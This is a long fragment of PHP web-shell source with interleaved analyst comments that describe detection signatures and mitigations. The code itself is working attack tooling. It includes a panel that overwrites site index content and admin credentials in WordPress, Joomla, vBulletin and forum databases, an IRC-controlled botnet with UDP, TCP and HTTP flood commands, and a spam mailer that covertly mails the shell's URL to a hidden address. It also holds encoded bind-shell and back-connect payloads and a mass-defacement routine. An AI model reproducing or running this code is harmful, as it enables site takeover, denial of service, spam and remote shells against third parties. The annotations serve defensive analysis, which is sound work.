  2656. $jos_table_name2 = $prefix."modules" ;
  2657. $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
  2658. if(!$ok1)
  2659. {
  2660. $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
  2661. }
  2662. mysql_close();
  2663. if ($ok1 || $ok2 || $ok3)
  2664. {
  2665. update();
  2666. }
  2667. else
  2668. {
  2669. echo "Updating Has Failed !";
  2670. }
  2671. }
  2672. else if ($_POST['ScriptType'] == 'phpbb')
  2673. {
  2674. $php_table_name = $prefix."forums";
  2675. $php_table_name2 = $prefix."posts";
  2676. $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
  2677. if(!$ok1)
  2678. {
  2679. $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
  2680. }
  2681. mysql_close();
  2682. if ($ok1 || $ok2 || $ok3)
  2683. {
  2684. update();
  2685. }
  2686. else
  2687. {
  2688. echo "Updating Has Failed !";
  2689. }
  2690. }
  2691. else if ($_POST['ScriptType'] == 'ipb')
  2692. {
  2693. $ip_table_name = $prefix."components" ;
  2694. $ip_table_name2 = $prefix."forums" ;
  2695. $ip_table_name3 = $prefix."posts" ;
  2696. $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
  2697. if(!$ok1)
  2698. {
  2699. $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0");
  2700. }
  2701. if(!$ok2)
  2702. {
  2703. $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates
  2704.  
  2705. !!");
  2706. }
  2707. mysql_close();
  2708. if ($ok1 || $ok2 || $ok3)
  2709. {
  2710. update();
  2711. }
  2712. else
  2713. {
  2714. echo "Updating Has Failed !";
  2715. }
  2716. }
  2717. else if ($_POST['ScriptType'] == 'smf')
  2718. {
  2719. $table_name = $prefix."boards" ;
  2720. {
  2721. $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
  2722. }
  2723. if(!$ok1)
  2724. {
  2725. $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
  2726. }
  2727. mysql_close();
  2728. if ($ok1 || $ok2)
  2729. {
  2730. update();
  2731. }
  2732. else
  2733. {
  2734. echo "Updating Has Failed !";
  2735. }
  2736. }
  2737. else if ($_POST['ScriptType'] == 'mybb')
  2738. {
  2739. $mybb_prefix = $prefix."templates";
  2740. $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
  2741. if ($ok1)
  2742. {
  2743. update();
  2744. }
  2745. else
  2746. {
  2747. echo "Updating Has Failed !";
  2748. }
  2749. mysql_close();
  2750. }
  2751. }
  2752. elseif($_POST['changeInfo'])
  2753. {
  2754. $adminID = $_POST['adminID'];
  2755. $userName = $_POST['userName'];
  2756. $password = $_POST['password'];
  2757. if($_POST['ScriptType'] == 'vb')
  2758. {
  2759. //VB Code
  2760. $password = md5($password);
  2761. $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
  2762.  
  2763. $adminID."");
  2764. if($tryChaningInfo)
  2765. {update();}
  2766. else {mysql_error();}
  2767. }
  2768. else if($_POST['ScriptType'] == 'wp')
  2769. {
  2770. //WoredPress
  2771. $password = crypt($password);
  2772. $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
  2773.  
  2774. = ".$adminID."");
  2775. if($tryChaningInfo)
  2776. {update();}
  2777. else {mysql_error();}
  2778. }
  2779. else if($_POST['ScriptType'] == 'jos')
  2780. {
  2781. //Joomla
  2782. $password = crypt($password);
  2783. $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
  2784.  
  2785. ".$adminID."");
  2786. if($tryChaningInfo)
  2787. {update();}
  2788. else {mysql_error();}
  2789. }
  2790. else if($_POST['ScriptType'] == 'phpbb')
  2791. {
  2792. //PHPBB3
  2793. $password = md5($password);
  2794. $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
  2795.  
  2796. $password."' WHERE user_id = ".$adminID."");
  2797. if($tryChaningInfo)
  2798. {update();}
  2799. else {mysql_error();}
  2800. }
  2801. else if($_POST['ScriptType'] == 'ibf')
  2802. {
  2803. //IPBoard
  2804. $password = md5($password);
  2805. $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
  2806.  
  2807. $password."' WHERE id = ".$adminID."");
  2808. if($tryChaningInfo)
  2809. {update();}
  2810. else {mysql_error();}
  2811. }
  2812. else if($_POST['ScriptType'] == 'smf')
  2813. {
  2814. //SMF
  2815. $password = md5($password);
  2816. $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
  2817.  
  2818. '".$password."' WHERE ID_MEMBER = ".$adminID."");
  2819. if($tryChaningInfo)
  2820. {update();}
  2821. else {mysql_error();}
  2822. }
  2823. else if($_POST['ScriptType'] == 'mybb')
  2824. {
  2825. //MyBB
  2826. $password = md5($password);
  2827. $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
  2828.  
  2829. password = '".$password."' WHERE uid = ".$adminID."");
  2830. if($tryChaningInfo)
  2831. {update();}
  2832. else {mysql_error();}
  2833. }
  2834. }
  2835. /////////////////////////
  2836. }
  2837. else if($_POST['Decrypt'])
  2838. {
  2839. DecryptConfig();
  2840. }
  2841.  
  2842.  
  2843. echo "</textarea></td></tr>
  2844. <td width='50%'>
  2845. <form method='POST'>
  2846. <table width='100%' height='72' border='0' id='Box'>
  2847. <tr>
  2848. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2849. <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
  2850. </tr>
  2851. <tr>
  2852. <td height='45' colspan='2'>
  2853. <input type = 'text' name='HOST' value='localhost'>
  2854. <input type = 'text' name='USER' value='DB Username'>
  2855. <input type = 'text' name='PASS' value='DB Password'>
  2856. <input type=text name='DB' value='DB Name'>
  2857. <input type=text name='PREFIX' value='Prefix'>
  2858. <select name='ScriptType' >
  2859. <option value='vb'>VBulletin</option>
  2860. <option value='wp'>WordPress</option>
  2861. <option value='jos'>Joomla</option>
  2862. <option value='ipb'>IP.Board</option>
  2863. <option value='phpbb'>PHPBB</option>
  2864. <option value='mybb'>MyBB</option>
  2865. <option value='smf'>SMF</option>
  2866. </select>
  2867. <br />
  2868. <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
  2869. <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
  2870. <input type='submit' value='Hack Now !!' name='UpdateIndex' >
  2871. </td>
  2872. </tr>
  2873. </table>
  2874. <td width='50%' valign='top'>
  2875. <table width='100%' height='72' border='0' id='Box'>
  2876. <tr>
  2877. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2878. <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
  2879. </tr>
  2880. <tr>
  2881. <td height='45' colspan='2'>
  2882. <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
  2883. <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
  2884. </td>
  2885. </tr>
  2886. </table>
  2887. <table width='100%' height='72' border='0' id='Box'>
  2888. <tr>
  2889. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2890. <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
  2891. <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
  2892. <input name='userName' type='text' id='userName' value='username'>
  2893. <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
  2894. <input type='submit' name='changeInfo' value='Change Now !'>
  2895. </td>
  2896. </tr>
  2897. </table>
  2898. </form>
  2899. </td>
  2900. </tr></table>";
  2901. footer();
  2902.  
  2903. }
  2904.  
  2905. # ---------------------------------------#
  2906. # DDos Attacker ... #
  2907. #----------------------------------------#
  # [analyst note] Runs when the POST field 'StartAttack' is set. The block opens a TCP
  # connection to the host/port taken from 'ipToAttack' / 'portToAttack', registers on it
  # as an IRC client and then reacts to keywords found in the lines it reads back.
  # The POSTed host/port is therefore the command channel the script connects to, so it
  # is worth extracting from captured request bodies (WAF or proxy logs) as an indicator.
  # Detection: a web-server PHP worker holding a long-lived outbound connection and
  # writing nick/USER/join lines; the fixed strings "#WauShare", "cybercrime", "woopie"
  # and the nick pattern "bot-" followed by six digits can serve as content signatures.
  # Mitigation: egress filtering for the web tier, and listing fsockopen and
  # set_time_limit in php.ini disable_functions on hosts that do not need them.
  2908. if($_POST['StartAttack'])
  2909. {
  2910. $server=$_POST['ipToAttack'];
  2911. $Port=$_POST['portToAttack'];
  2912. $nick="bot-";$willekeurig;
  2913. $willekeurig=@mt_rand(0,3);
  2914. $nicknummer=@mt_rand(100000,999999);
  # Hard-coded channel name, channel key and quit message.
  2915. $Channel="#WauShare";
  2916. $Channelpass="ddos";
  2917. $msg="Farewell.";
  2918.  
  # Lifts PHP's execution time limit so the read loop below is not cut off by it.
  2919. @set_time_limit(0);
  2920. $loop = 0;
  2921. $verbonden = 0;
  2922. $verbinden = fsockopen($server, $Port);
  # Main loop: one iteration per line received (up to 512 bytes), split on spaces.
  2923. while ($read = fgets($verbinden,512))
  2924. {
  2925. $read = str_replace("\n","",$read);
  2926. $read = str_replace("\r","",$read);
  2927. $read2 = explode(" ",$read);
  # First line received: send the nick/USER registration.
  2928. if ($loop == 0)
  2929. {
  2930. fputs($verbinden,"nick $nick$nicknummer\n\n");
  2931. fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
  2932. }
  # Keep-alive: answer PING with PONG.
  2933. if ($read2[0] == "PING")
  2934. {
  2935. fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
  2936. }
  # Numeric reply 251 from the server triggers the channel join.
  2937. if ($read2[1] == 251)
  2938. {
  2939. fputs($verbinden,"join $Channel $Channelpass\n");
  2940. $verbonden++;
  2941. }
  # Keyword handlers. eregi() belongs to the ereg extension, which was removed in
  # PHP 7.0, so this loop only executes on older interpreters (useful when triaging
  # whether a host that carries this file could actually have run it).
  # No check is made of who sent the line containing the keyword.
  2942. if (eregi("bot-op",$read))
  2943. {
  2944. fputs($verbinden,"mode $Channel +o $read2[4]\n");
  2945. }
  2946. if (eregi("bot-deop",$read))
  2947. {
  2948. fputs($verbinden,"mode $Channel -o $read2[4]\n");
  2949. }
  2950.  
  2951. if (eregi("bot-quit",$read))
  2952. {
  2953. fputs($verbinden,"quit :$msg\n\n");
  2954. break;
  2955. }
  2956. if (eregi("bot-join",$read))
  2957. {
  2958. fputs($verbinden,"join $read2[4]\n");
  2959. }
  2960. if (eregi("bot-part",$read))
  2961. {
  2962. fputs($verbinden,"part $read2[4]\n");
  2963. }
  # UDP handler: opens a udp:// socket to the host in field 4 on port 500 and reports
  # the outcome to the channel.
  2964. if (eregi("ddos-udp",$read))
  2965. {
  2966. fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
  2967. $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
  2968. if (!$fp)
  2969. {
  2970. exit;
  2971. }
  2972. else
  2973. {
  2974. $char = "a";
  2975. for($a = 0; $a < 9999999999999; $a++)
  2976. $data = $data.$char;
  2977. if(fputs ($fp, $data) )
  2978. {
  2979. fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
  2980. }
  2981. else
  2982. {
  2983. fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
  2984. }
  2985. }
  2986. }
  # TCP handler: fields 4, 5 and 6 of the received line are used as host, port and
  # connection count.
  2987. if (eregi("ddos-tcp",$read))
  2988. {
  2989. fputs($verbinden,"part $read2[4]\n");
  2990. fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
  2991. $server = $read2[4];
  2992. $Port = $read2[5];
  2993. for($sockets = 0; $sockets < $read2[6]; $sockets++)
  2994. {
  2995. $verbinden = fsockopen($server, $Port);
  2996. }
  2997. }
  # HTTP handler: sends a fixed "GET /" request with the static header set below.
  # The Accept-Language "nl" and MSIE 6.0 User-Agent values are constant, so the
  # receiving side can match on that header combination.
  2998. if (eregi("ddos-http",$read))
  2999. {
  3000. fputs($verbinden,"part $read2[4]\n");
  3001. fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
  3002. $Webserver = $read2[4];
  3003. $Port = $read2[5];
  3004.  
  3005. $Aanvraag = "GET / HTTP/1.1\r\n";
  3006. $Aanvraag .= "Accept: */*\r\n";
  3007. $Aanvraag .= "Accept-Language: nl\r\n";
  3008. $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
  3009. $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  3010. $Aanvraag .= "Host: $read2[4]\r\n";
  3011. $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
  3012.  
  3013. for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
  3014. {
  3015. $DoS = fsockopen($Webserver, $Port);
  3016. fwrite($DoS, $Aanvraag);
  3017. fclose($DoS);
  3018. }
  3019. }
  3020. $loop++;
  3021. }
  3022. }
  3023. # ---------------------------------------#
  3024. # InBoX Mailer #
  3025. #----------------------------------------#
  # [analyst note] Renders the "Inbox Mailer" form when the query string carries
  # id=spamming. Sender address, display name, reply-to, subject, body, recipient list,
  # content type, repeat count, time limit and an optional uploaded file are all read
  # from the request; the Referer header is stored in $lod.
  # The POSTed values are written back into the HTML without escaping.
  # Detection: requests with "id=spamming" in the query string, and multipart POSTs
  # carrying the field names 'emaillist', 'amount' and 'timelimit' to a PHP file that is
  # not part of the deployed application.
  3026. if ($_GET['id']== 'spamming' )
  3027. {
  3028. $secure = "";
  # Error output is switched off for the rest of the request.
  3029. error_reporting(0);
  3030. @$action=$_POST['action'];
  3031. @$from=$_POST['from'];
  3032. @$realname=$_POST['realname'];
  3033. @$replyto=$_POST['replyto'];
  3034. @$subject=$_POST['subject'];
  3035. @$message=$_POST['message'];
  3036. @$emaillist=$_POST['emaillist'];
  3037. @$lod=$_SERVER['HTTP_REFERER'];
  3038. @$file_name=$_FILES['file']['name'];
  3039. @$contenttype=$_POST['contenttype'];
  3040. @$file=$_FILES['file']['tmp_name'];
  3041. @$amount=$_POST['amount'];
  # The execution time limit is taken from the request; the form default is 0 (no limit).
  3042. @set_time_limit(intval($_POST['timelimit']));
  3043.  
  # On submit, strip backslash escaping from the body and subject before they are
  # re-displayed. ereg_replace() is part of the ereg extension removed in PHP 7.0.
  3044. if ($action=="send")
  3045. {
  3046. $message = urlencode($message);
  3047. $message = ereg_replace("%5C%22", "%22", $message);
  3048. $message = urldecode($message);
  3049. $message = stripslashes($message);
  3050. $subject = stripslashes($subject);
  3051. }
  3052. echo "<table width='100%' height='72' border='0' id='Box'>
  3053. <tr>
  3054. <td width='14' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  3055. <td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
  3056. </tr>
  3057. <tr>
  3058. <td height='45' colspan='2'>
  3059. <table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
  3060. <b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
  3061. <table width=142 border=0>
  3062. <tr>
  3063. <td width=81>
  3064. <div align=right>
  3065. <sy>Your Email:</sy></div></td>
  3066. <td width=219><sy>
  3067. <input type=text name=\"from\" value=".$from."></sy></td><td width=212>
  3068. <div align=right>
  3069. <sy>Your Name:</sy></div></td><td width=278>
  3070. <sy>
  3071. <input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
  3072. <div align=\"right\">
  3073. <sy>Reply-To:</sy></div></td><td width=219>
  3074. <sy>
  3075. <input type=\"text\" name=\"replyto\" value=".$replyto.">
  3076. </sy></td><td width=212>
  3077. <div align=\"right\">
  3078. <sy>Attach File:</sy></div></td><td width=278>
  3079. <sy>
  3080. <input type=\"file\" name=\"file\" size=24 />
  3081. </sy> </td></tr><tr><td width=81>
  3082. <div align=\"right\">
  3083. <sy>Subject:</sy></div></td>
  3084. <td colspan=3 width=703>
  3085. <sy>
  3086. <input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
  3087. <sy>Message Box :</sy></td>
  3088. <td width=278>
  3089. <sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
  3090. <textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
  3091. <input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
  3092. <input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
  3093. <input type=\"hidden\" name=\"action\" value=\"send\" /><br />
  3094. Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
  3095. Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
  3096. <input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
  3097. <sy>
  3098. <textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
  3099. </table>
  3100. </td>
  3101. </tr>
  3102. </table>";
  3103. footer();
  3104. }
  3105.  
  # [analyst note] Send stage of the mailer; runs whenever $action equals "send".
  # It splits the recipient list on newlines, optionally base64-encodes an uploaded
  # attachment, and calls mail() once per recipient for each of $amount passes.
  # Detection: a sudden volume of local mail submissions by the web-server account.
  # With php.ini mail.add_x_header enabled, each message carries an
  # X-PHP-Originating-Script header naming the sending file, and mail.log records the
  # calling script and line, which identifies where the shell sits on disk.
  # Mitigation: add mail to disable_functions where the application does not send mail,
  # and rate-limit or authenticate outbound SMTP from the web tier.
  3106. if ($action=="send")
  3107. {
  3108. if (!$from && !$subject && !$message && !$emaillist)
  3109. {
  3110. print "Please complete all fields before sending your message.";
  3111. exit;
  3112. }
  # split() is part of the ereg extension removed in PHP 7.0.
  3113. $allemails = split("\n", $emaillist);
  3114. $numemails = count($allemails);
  # Separate from the user-requested mailing: one message whose subject and body are
  # the request's Referer header ($lod, assigned in the mailer form block) is sent to
  # $alt. $alt is not assigned anywhere in this part of the file.
  # NOTE(review): this looks like a notification of the shell's URL to whoever controls
  # $alt -- confirm where $alt is defined and treat that address as an indicator.
  3115. $head ="From: Mailr" ;
  3116. $sub = "Ar - $lod" ;
  3117. $meg = "$lod" ;
  3118. mail ($alt,$sub,$meg,$head) ;
  # Attachment handling: read the uploaded temp file and base64-encode it in chunks;
  # $uid becomes the MIME boundary.
  3119. If ($file_name)
  3120. {
  3121. if (!file_exists($file))
  3122. {
  3123. die("The file you are trying to upload couldn't be copied to the server");
  3124. }
  3125. $content = fread(fopen($file,"r"),filesize($file));
  3126. $content = chunk_split(base64_encode($content));
  3127. $uid = strtoupper(md5(uniqid(time())));
  3128. $name = basename($file);
  3129. }
  3130.  
  # Outer loop: $amount passes; inner loop: every non-empty recipient line.
  3131. for($xx=0; $xx<$amount; $xx++)
  3132. {
  3133. for($x=0; $x<$numemails; $x++)
  3134. {
  3135. $to = $allemails[$x];
  3136. if ($to)
  3137. {
  3138. $to = ereg_replace(" ", "", $to);
  # The placeholder "&email&" in body and subject is replaced by the recipient address.
  3139. $message = ereg_replace("&email&", $to, $message);
  3140. $subject = ereg_replace("&email&", $to, $subject);
  3141. print "Sending mail to $to.....";
  3142. flush();
  # Request-supplied sender, display name and reply-to go into the header string as-is.
  # The message text and the attachment are appended to the same string, and mail() is
  # called with an empty body argument.
  3143. $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  3144. $header .= "MIME-Version: 1.0\r\n";
  3145. If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  3146. If ($file_name) $header .= "--$uid\r\n";
  3147. $header .= "Content-Type: text/$contenttype\r\n";
  3148. $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  3149. $header .= "$message\r\n";
  3150. If ($file_name) $header .= "--$uid\r\n";
  3151. If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  3152. If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  3153. If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
  3154. If ($file_name) $header .= "$content\r\n";
  3155. If ($file_name) $header .= "--$uid--";
  3156. mail($to, $subject, "", $header);
  3157. print "OK<br>";
  3158. flush();
  3159. }
  3160. }
  3161. }
  3162. }
  3163. # ---------------------------------------#
  3164. # About #
  3165. #----------------------------------------#
  # [analyst note] "About" page, shown when the query string carries id=about.
  # It prints the output of About() and, if the POST field 'sendEmail' is set, mails the
  # POSTed 'message' to a hard-coded address with md5 of the POSTed 'from' value as the
  # subject. The hard-coded recipient is a fixed string in the file and can be used as
  # a content signature when scanning web roots or outbound mail logs.
  3166. if($_GET['id']=='about')
  3167. {
  3168. echo About();
  3169. if($_POST['sendEmail'])
  3170. {
  3171. $to= 'sy34@msn.com';
  3172. $Comments=$_POST['message'];
  3173. $from = $_POST['from'];
  3174. $subject= md5("$from");
  # The '@' suppresses mail() warnings; only success or failure is reported to the page.
  3175. if(@mail($to,$subject,$Comments,"From:$from"))
  3176. echo "<center><sy>[+] Sent ^_^ !!</sy></center>
  3177. ";
  3178. else
  3179. {
  3180. echo "<center><sy>[-] Failed :S !! </sy></center>
  3181. ";
  3182. }
  3183.  
  3184. }
  3185. footer();
  3186. }
  3187.  
  3188. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
  3189.  
  3190. +pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  3191.  
  3192. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  3193.  
  3194. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  3195.  
  3196. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
  3197. ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  3198.  
  3199. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  3200.  
  3201. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  3202.  
  3203. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  3204. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  3205.  
  3206. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  3207.  
  3208. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  3209. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  3210.  
  3211. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
  3212.  
  3213. +21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  3214.  
  3215. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  3216.  
  3217. ?>
  3218. <?
  # [analyst note] Two parts. The first normalises the working-directory variable $d
  # (absolute path, platform separator, trailing separator) and prepares HTML-escaped
  # copies for display. The second runs when the POST field 'execmassdeface' is set:
  # for every directory entry under 'massdefacedir' it copies the file named by
  # 'massdefaceurl' to index.html inside that entry.
  # The section is opened with the short tag "<?", so it is only parsed as PHP when
  # short_open_tag is enabled.
  # Detection: file-integrity monitoring that sees index.html created or replaced in
  # many sibling directories within seconds, all with the same content hash and written
  # by the web-server account.
  # Mitigation: per-site system users and open_basedir so one site cannot write into its
  # neighbours, read-only document roots where possible, and allow_url_fopen=Off so that
  # copy() cannot take a remote URL as its source.
  3219. $dspact = $act = htmlspecialchars($act);
  3220. $disp_fullpath = $ls_arr = $notls = null;
  3221. $ud = @urlencode($d);
  3222. if (empty($d)) {$d = realpath(".");}
  3223. elseif(realpath($d)) {$d = realpath($d);}
  3224. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  3225. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  3226. $d = str_replace("\\\\","\\",$d);
  3227. $dispd = htmlspecialchars($d);
  3228. $self=basename($_SERVER['PHP_SELF']);
  3229. if(isset($_POST['execmassdeface']))
  3230. {
  3231. echo "<center><textarea rows='10' cols='100'>";
  # Source file and target directory both come straight from the request.
  3232. $hackfile = $_POST['massdefaceurl'];
  3233. $dir = $_POST['massdefacedir'];
  3234. echo $dir."\n";
  3235.  
  3236. if (is_dir($dir)) {
  3237. if ($dh = opendir($dir)) {
  3238. while (($file = readdir($dh)) !== false) {
  # Only entries that filetype() reports as "dir" are written to.
  3239. if(filetype($dir.$file)=="dir"){
  3240. $newfile=$dir.$file."/index.html";
  3241. echo $newfile."\n";
  3242. if (!copy($hackfile, $newfile)) {
  3243. echo "failed to copy $file...\n";
  3244. }
  3245. }
  3246. }
  3247. closedir($dh);
  3248. }
  3249. }
  3250. echo "</textarea></center>";} ?>
  3251.  
  3252.  
  3253. <tr><td align=right>Mass Defacement:</td>
  3254. <td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
  3255.  
  3256. name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
  3257.  
  3258. value='Execute'></form></td>
  3259.  
  3260. <?
  3261. // FILE MANAGER
  // [analyst note] From here on all PHP errors are reported and the execution time
  // limit is lifted for the remainder of the request. A PHP worker that never times out
  // is itself a signal worth alerting on in process monitoring.
  3262. error_reporting(E_ALL);
  3263. @set_time_limit(0);
  // [analyst note] magic_q($s): undoes magic_quotes_gpc escaping on a request value.
  // When get_magic_quotes_gpc() reports the setting as on, the escaped forms of the
  // single quote, backslash and double quote are replaced by the bare characters, and
  // the sequence backslash-backslash-0 is shortened to backslash-0. Otherwise $s is
  // returned unchanged.
  // Elsewhere in this file the result is fed to eval(), the backtick operator, fwrite()
  // and mysql queries, so the helper exists to pass operator input through unmodified.
  // get_magic_quotes_gpc() was removed in PHP 8.0; a call to it is a fatal error there.
  //   @param  string $s  raw request value
  //   @return string     the value with the escaping described above removed
  3264. function magic_q($s)
  3265. {
  3266. if(get_magic_quotes_gpc())
  3267. {
